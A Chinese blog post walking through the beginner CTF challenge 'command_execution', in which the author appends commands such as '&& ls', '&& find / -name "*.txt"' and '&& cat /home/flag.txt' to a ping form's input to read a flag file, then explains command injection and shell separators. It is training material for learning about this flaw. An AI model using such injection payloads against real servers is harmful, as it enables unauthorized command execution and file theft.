攻防世界-web-新手练习区(4)-command_execution

最新推荐文章于 2025-07-17 18:46:59 发布
原创 最新推荐文章于 2025-07-17 18:46:59 发布 · 2.6k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细解析了如何利用命令执行漏洞,通过拼接命令在目标服务器上执行任意操作,最终成功读取flag.txt文件获取flag。介绍了命令执行漏洞的概念及常见命令连接符的使用方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目

[外链图片转存失败(img-POLxFvpf-1562054492256)(E:\CTF\小白学习总结\攻防世界\web\picture\11.ti.PNG)]

[外链图片转存失败(img-qeZZoVAb-1562054492258)(E:\CTF\小白学习总结\攻防世界\web\picture\11.1.PNG)]

Writeup

因为是ping,所以尝试

ping 127.0.0.1

[外链图片转存失败(img-0cu3mAx3-1562054492259)(E:\CTF\小白学习总结\攻防世界\web\picture\11.2.PNG)]

可以正常执行

尝试命令拼接执行

127.0.0.1 && ls

[外链图片转存失败(img-DqOyuKuC-1562054492260)(E:\CTF\小白学习总结\攻防世界\web\picture\11.3.PNG)]

可以正常执行

尝试找到所有的.txt文件(这里是参考大佬思路)

127.0.0.1 && find / -name "*.txt"

[外链图片转存失败(img-OR7slHWa-1562054492260)(E:\CTF\小白学习总结\攻防世界\web\picture\11.4.PNG)]

发现flag.txt

于是打开flag.txt文件,得到flag

127.0.0.1 && cat /home/flag.txt

[外链图片转存失败(img-pJazcvZL-1562054492262)(E:\CTF\小白学习总结\攻防世界\web\picture\11.flag.PNG)]

知识点

命令执行漏洞

当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。

在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令

  • A&&B,表示A命令语句执行成功,然后执行B命令语句
  • A&B,表示简单的拼接,A命令语句和B命令语句没有制约关系
  • A|B,表示A命令语句的输出,作为B命令语句的输入执行
  • A||B,表示A命令语句执行失败,然后才执行B命令语句
  • A;B,表示先执行A,再执行B

推荐文章:

https://www.freebuf.com/column/154670.html

https://www.cnblogs.com/xiaozi/p/7831529.htm

攻防世界command_executionweb简单)
my_name_is_sy的博客
05-31 467
在一个没有写waf的地方给shell命令的执行权限是真的危险啊。 这个题主要考点为shell命令的拼接。 文章中包含了几种常见的shell命令拼接方法。
ctf web5 练习_CTF-攻防世界-WEB新手练习 Writeup(12题入门题)
weixin_33603656的博客
01-15 3826
注:作者是CTF初学者,边学习边记录,如有错误或疏漏请批评指正,也请各位大佬多多包涵。攻防世界-WEB新手练习 12题入门题 Writeup(注意:攻防世界WEB题每次生成场景后,有时flag会改变,因此flag不同不要在意,主要是学习解题思路和方法)0X01view_sourceX老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。题目提示查看源码,鼠标右键不管用,用F12...
攻防世界-command_execution
m0_62094846的博客
10-24 6186
 ping是Windows、Unix和Linux系统下的一个命令。ping也属于一个通信协议,是TCP/IP协议的一部分。利用“ping”命令可以检查网络是否连通,可以很好地帮助我们分析和判定网络故障。应用格式:Ping空格IP地址。该命令还可以加许多参数使用,具体是键入Ping按回车即可看到详细说明。 作用:它是用来检查网络是否通畅或者网络连接速度的命令。 它所利用的原理是这样的:利用网络上机器IP地址的唯一性,给目标IP地址发送一个数据包,再要求对方返回一个同样大小的数据包来确定两台网络机器是否
攻防世界web | easyphp 详细题解WP
最新发布
2301_80637449的博客
07-17 893
本文详细解析了攻防世界Web题目"easyphp"的解题方法,通过构造特殊输入绕过多重条件检查获取flag。关键点包括:1)利用PHP弱类型特性,使用科学计数法1e9满足$a的数值和长度要求;2)通过MD5碰撞获取$b=53724使其哈希值后6位为8b184b;3)精心构造$c={"m":"2023a","n":[[1,2],0]},利用PHP类型转换和比较特性绕过检查。文章深入分析了各漏洞点的技术原理,包括科学计数法处理、哈希
攻防世界command_execution
qq_60905276的博客
11-09 5949
1.攻防世界command_execution 首先掌握命令执行漏洞(Command Execution)的知识。 命令执行漏洞即使用者可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。其造成的原因是Web服务器对用户输入命令安全检测不足(比如没加waf),导致恶意代码被执行。 ping用于确定本地主机是否能与另一台主机成功交换(发送与接收)数据包,再根据返回的信息,就可以推断TCP/IP参数是否设置正确,以及运行是否正常、网络是否通畅等 如题就是没写waf,用户输入
攻防世界-WEBcommand_execution
wlw1275178332的博客
03-16 286
command1 && command2 先执行 command1,如果为真,再执行 command2。command1 || command2 先执行 command1,如果为假,再执行 command2。题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。command1 & command2 先执行 command2 后执行 command1。根据题目描述,我们可以推测应该是在ping命令拼接了其他命令导致文件信息的泄露。发现txt文件,直接用cat查看。
攻防世界-- web新手练习-- writeup汇总
yisosooo的博客
09-22 2591
一篇帖子包含所有题目。 第一题-- view_source 题目提示:鼠标右键好像不管用了。鼠标右键的主要功能之一是选取网易源代码选项,所以可以F12来查看源代码。即可得到flag。 第二题-- get_post 题目提示:HTTP通常使用两种请求方法。HTTP通常使用两种请求方法为GET和POST. 第一步:请用GET方式提交一个名为a,值为1的变量,构造URL:http://111....
2021-06-24CTF-攻防世界-WEB新手练习(12题入门题)
u258710的博客
06-24 2840
CTF-攻防世界-WEB新手练习(12题入门题)01-view_source02-robots03-backup04-cookie05-disabled_button06-weak_auth07-simple_php08-get_post09-xff_referer10-webshell11-command_execution12-simple_js 01-view_source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 题目提示查看网页源代码,但鼠标右键不管用
CTF-攻防世界web新手入门篇
热门推荐
weixin_45923850的博客
04-14 1万+
CTF练习题目
攻防世界 web新手练习题解 下
weixin_46330722的博客
10-30 777
攻防世界 web新手练习题解 下simple_phpget_postxff_refererwebshellcommand_executionsimple_js simple_php 题目直接给出了源码,我们直接来分析一下,首先题目是要求我们通过get方式传递一个名为a和一个名为b的参数,并分别赋值给$a,$b。第一个判断是$a=0并且$a不能被判断为false。本地搭一个测试页面。 访问一下,并传递值为0的a参数 可见,$a被判断为了false。这里我们应该看到它使用的比较符==,看一下官方文档。
攻防世界-web-command_execution
MateSnake的博客
05-11 325
攻防世界-web-command_execution
攻防世界web新手关之command_execution
weixin_45746283的博客
11-16 668
攻防世界web新手关之command_execution 需要使用到ping注入
攻防世界-web新手
hanqdi_的博客
02-18 522
view_source 根据题目描述,要查看一个网页的源代码,按照之前的操作,要么右键-》查看源代码,要么按f12查看源代码,这里鼠标右键不管用了,就按f12(Mac里按command+option+4) 还可以根据题目提示,view_source,可以用view-source指令查看源代码:view-source:网址 例如: robots 根据提示,用到robots协议。 什么是robo...
攻防世界 web 新手
m0_51357657的博客
03-07 236
cookie weak_auth simplejs webshell COOKIE 根据题目提示先查看cookie 查看cookie.php 根据提示查看请求头 weak_auth 常见用户名admin+随便输个密码,抓包,发给测试器 提示:用字典 到github上下载字典,load字典 在需要爆破的地方添加符号 作为一个几乎没做过web的废物。。一开始发POST没有加Content-Type: application/x-www-form-urlencoded。。。。我tcl。。 找到返回长.
攻防世界web新手
lceFIre的博客
08-31 836
攻防世界web新手第一题view_source第二题get_post第三题robots第四题Backup第五题cookie第六题disabled_button第七题simple_js第八题xff_referer第九题weak_auth第十题webshell第十一题command_execution第十二题simple_php 第一题view_source f12查看源码 第二题get_post ...
攻防世界-web-新手练习(2)
wyj_1216 House
05-22 3929
0x01simple_js 题目 writeup 首先随便输入,进入页面,查看页面源代码 发现pass,尝试转换为ASCII码对应的, 发现是提示密码输入错误的话 然后看到fromCharCode,尝试转换为十进制,并转换为ASCII码相对应的根据题目提示的flag格式,最终得到flag为:Cyberpeace{786OsErtk12} 附~ simple_js function dechiff...
攻防世界-get_post
08-24
攻防世界中,"get_post" 是一个题目,要求学习如何使用GET和POST请求来传递参数。在这个题目中,首先让我们使用GET方式传递一个名为a,值为1的变量。我们只需要在URL窗口输入"/?a=1"并回车即可。接下来,又让我们...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值